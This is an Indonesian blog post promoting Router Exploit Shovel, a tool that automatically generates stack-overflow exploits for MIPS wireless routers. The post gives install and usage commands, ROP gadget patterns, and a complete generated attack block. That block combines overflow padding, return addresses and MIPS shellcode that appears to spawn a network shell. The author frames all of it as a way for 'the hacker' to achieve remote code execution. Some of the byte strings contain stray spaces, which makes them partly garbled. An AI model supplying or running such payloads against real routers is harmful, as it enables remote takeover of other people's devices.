Router Exploit Shovel - Pembuatan Aplikasi Otomatis Untuk Jenis Stack Overflow Pada Router Nirkabel

Hasil gambar untuk Router Exploit Shovel
Terimakasih, Oke kali ini saya akan memberikan info ke kalian
ini tepat untuk kalian yang berkecimpun dibidang jaringan :V
hehe karna disini ada tool untuk penghasil aplikasi otomatis untuk tipe overlow stack
oke langsung aja ke pembahasan

Nama Tools Ini Router Exploit Shovel
apa sih Router Exploit Shovel itu?

Router exploits shovel adalah alat penghasil aplikasi otomatis untuk tipe
overflow stack pada router nirkabel.
kegunaan alat ini bisa mengimplementasikan fungsi-fungsi utama dari exploit,
tools ini dapat beradaptasi dengan panjang data padding pada stack,
bisa menghasilkan rantai ROP, dan juga menghasilkan shellcode yang disediakan
dan pada akhirnya bisa merakit menjadi kode serangan yang lengkap (wahh mantaps juga nih hehe)
sang hacker hanya perlu melampirkan kode serangan kelokasi meluap POC untuk
menyelesaikan Exploitasi eksekusi kode jauh
tapiii :( Alat ini Supprot MIPSel dan MIPSeb berjalan di Ubuntu 16.04 4bit.

Oke langsung aja ke tahap penginstallannya yang terpenting diatas
sudah saya kasih pengertian dari tools ini

Install
disini jika belum menginstall git,python3 dan setuptools harap di install dulu
banyak digoogle cari aja jangan maunya di suapin terus :V


root@darkclownsec~:# git clone https://github.com/arthastang/Router-Exploit-Shovel.git


nah jika sudah di install langsung install bahan bahannya


root@darkclownsec~:# cd Router-Exploit-Shovel/

root@darkclownsec~:# python3 setup.py install


Cara pake nya


root@darkclownsec~:# python3 Router_Exploit_Shovel.py -h
Usage: Router_Exploit_Shovel.py [options]


Options:

  -h, --help            show this help message and exit

  -b BINARYFILEPATH, --binaryFile=BINARYFILEPATH

                        input binary file path

  --ba=BINARYBASEADDR, --binaryBaseAddr=BINARYBASEADDR

                        input binary base address,default=0x00400000

  -l LIBRARYFILEPATH, --libraryFile=LIBRARYFILEPATH

                        input libc file path

  --la=LIBRARYBASEADDR, --libraryBaseAddr=LIBRARYBASEADDR

                        input library base address,default=0x2aae2000

  -o OVERFLOWFUNCTIONPOINTOFFSET, --overflowPoint=OVERFLOWFUNCTIONPOINTOFFSET

                        input overflow function point offset

  --arch=ARCH           input architecture of elf files,[little] or

                        [big],default=big



ini contoh yaa

root@darkclownsec~:# python3 Router_Exploit_Shovel.py -b test_binaries/mipseb-httpd -l test_binaries/libuClibc-0.9.30.so -o 0x00478584

oke strukturnya jadi kaya gini


--Router_Exploit_Shovel.py       #Startup script

--databases/                     

  |---ROP_patterns/              #YAML file of ROP patterns        

  |---shellcodes/                #YAML file of shellcodes

--example/                       #Nday vulnerabilities, full report and exploit code

--results/                       

  |---ROP_gadgets/               #ROP gadgets generating results       

  |---attackBlock.txt            #Attack block generating results

--ropper/                        #Modified ropper module to get all gadgets

--filebytes/                     #Filebytes module to load ELFs

--router_exp_shovel/             #Main module         

  |---offset_calculator/         #Calculate padding size 

  |---ROP_maker/                 #Make ROP chains

  |---shellcode_maker/           #Make shellcodes

--qemuTestEnvironment/           #MIPS run-environment for router exploitation

Pembuatan rantai ROP
tools ini bisa menggunakan pola untuk menghasilkan rantai ROP. Ekstrak pola dari prosedur
exploitasi ROP umum, gunakan pencocokan regex unutk menemukan gadget yang tersedia untuk mengisi
string berantai, kode Base4 adalah untuk menghindari lolosnya karakter duplikat. sebagai contoh:


chainString: (gadget2)(gadget1)BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB(sleep)CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC(call_code)DDDD(stack_gadget)\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44

gadget1: KC4qKW1vdmUgXCR0OVwsIFwkczE7IGx3IFwkcmFcLCAweDI0XChcJHNwXCk7IGx3IFwkczFcLCAweDIwXChcJHNwXCk7IGx3IFwkczBcLCAweDFjXChcJHNwXCk7KC4qKTsganIgXCR0OTsgYWRkaXUgXCRzcFwsIFwkc3BcLCAweDI4Ow==

#gadget1: (.*)move \\$t9\\, \\$s1; lw \\$ra\\, 0x24\\(\\$sp\\); lw \\$s1\\, 0x20\\(\\$sp\\); lw \\$s0\\, 0x1c\\(\\$sp\\);(.*); jr \\$t9; add   iu \\$sp\\, \\$sp\\, 0x28; 

gadget2: KC4qKWFkZGl1IFwkYTBcLCBcJHplcm9cLCAxOyBtb3ZlIFwkdDlcLCBcJHMxOyBqYWxyIFwkdDk7

#gadget2: (.*)addiu \\$a0\\, \\$zero\\, 1; move \\$t9\\, \\$s1; jalr \\$t9;

call_code: KC4qKW1vdmUgXCR0OVwsIFwkczI7IGphbHIgXCR0OTs=

#call_code: (.*)move \\$t9\\, \\$s2; jalr \\$t9;

stack_gadget: KC4qKWFkZGl1IFwkczJcLCBcJHNwXCwgMHgxODsoLiopbW92ZSBcJHQ5XCwgXCRzMDsgamFsciBcJHQ5Ow==

#stack_gadget: (.*)addiu \\$s2\\, \\$sp\\, 0x18;(.*)move \\$t9\\, \\$s0; jalr \\$t9;

Blok Serangan
anda bisa mendapatkan blok serangan yang dihasilkan di hasil /attackBlocks.txt seperti:


attackBlock = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x2a\xb3\x7c\x60\x2a\xb2\xbd\xfcBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB\x2a\xb3\x5c\xa0CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC\x2a\xb0\x09\x38DDDD\x2a\xaf\x76\x68\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x3c\x11\x99\x99\x36\x31\x99\x99\x27\xb2\x05\x4b\x22\x52\xfc\xa0\x8e\x4a\xfe\xf9\x02\x2a\x18\x26\xae\x43\xfe\xf9\x8e\x4a\xff\x4   1\x02\x2a\x18\x26\xae\x43\xff\x41\x8e\x4a\xff\x5d\x02\x2a\x18\x26\xae\x43\xff\x5d\x8e\x4a\xff\x71\x02\x2a\x18\x26\xae\x43\xff\x71\x8e\x4a\xff\x8d\x02\x2a\x18\x26\xae\x43\xff\x8d\x8e\x4a\xff\x99\x02\x2a\x18\x26\xae\x43\xff\x99\x8e\x4a\xff\xa5\x02\x2a\x18\x26\xae\x43\xff\xa5\x8e\x4a\xff\xad\x02\x2a\x18\x26\xae\x43\xff\xad\x8e\x4a\xff\xb9\x02\x2a\x18\x26\xae\x43\xff\xb9\x8e\x4a\xff\xc1\x02\x2a\x18\x26\xae\x43\xff\xc1\x24\x12\xff\xff\x24\x02\x10\x46\x24\x0f\x03\x08\x21\xef\xfc\xfc\xaf\xaf\xfb\xfe\xaf\xaf\xfb\xfa\x27\xa4\xfb\xfa\x01\x01\x01\x0c\x21\x8c\x11\x5c\x27\xbd\xff\xe0\x24\x0e\xff\xfd\x98\x59\xb9\xbe\x01\xc0\x28\x27\x28\x06\xff\xff\x24\x02\x10\x57\x01\x01\x01\x0c\x23\x39\x44\x44\x30\x50\xff\xff\x24\x0e\xff\xef\x01\xc0\x70\x27\x24\x0d\x7a\x69\x24\x0f\xfd\xff\x01\xe0\x78\x27\x01\xcf\x78\x04\x01\xaf\x68\x25\xaf\xad\xff\xe0\xaf\xa0\xff\xe4\xaf\xa0\xff\xe8\xaf\xa0\xff\xec\x9b\x89\xb9\xbc\x24\x0e\xff\xef\x01\xc0\x30\x27\x23\xa5\xff\xe0\x24\x02\x10\x49\x01\x01\x01\x0c\x24\x0f\x73\x50\x9b   \x89\xb9\xbc\x24\x05\x01\x01\x24\x02\x10\x4e\x01\x01\x01\x0c\x24\x0f\x73\x50\x9b\x89\xb9\xbc\x28\x05\xff\xff\x28\x06\xff\xff\x24\x02\x10\x48\x01\x01\x01\x0c\x24\x0f\x73\x50\x30\x50\xff\xff\x9b\x89\xb9\xbc\x24\x0f\xff\xfd\x01\xe0\x28\x27\xbd\x9b\x96\x46\x01\x01\x01\x0c\x24\x0f\x73\x50\x9b\x89\xb9\xbc\x28\x05\x01\x01\xbd\x9b\x96\x46\x01\x01\x01\x0c\x24\x0f\x73\x50\x9b\x89\xb9\xbc\x28\x05\xff\xff\xbd\x9b\x96\x46\x01\x01\x01\x0c\x3c\x0f\x2f\x2f\x35\xef\x62\x69\xaf\xaf\xff\xec\x3c\x0e\x6e\x2f\x35\xce\x73\x68\xaf\xae\xff\xf0\xaf\xa0\xff\xf4\x27\xa4\xff\xec\xaf\xa4\xff\xf8\xaf\xa0\xff\xfc\x27\xa5\xff\xf8\x24\x02\x0f\xab\x01\x01\x01\x0c\x24\x02\x10\x46\x24\x0f\x03\x68\x21\xef\xfc\xfc\xaf\xaf\xfb\xfe\xaf\xaf\xfb\xfa\x27\xa4\xfb\xfe\x01\x01\x01\x0c\x21\x8c\x11\x5c"

Oke skian dan terimakasih semoga bermanfaat buat kalean yang berkecimpun di bidang jaringan :3
bye.

0 Comments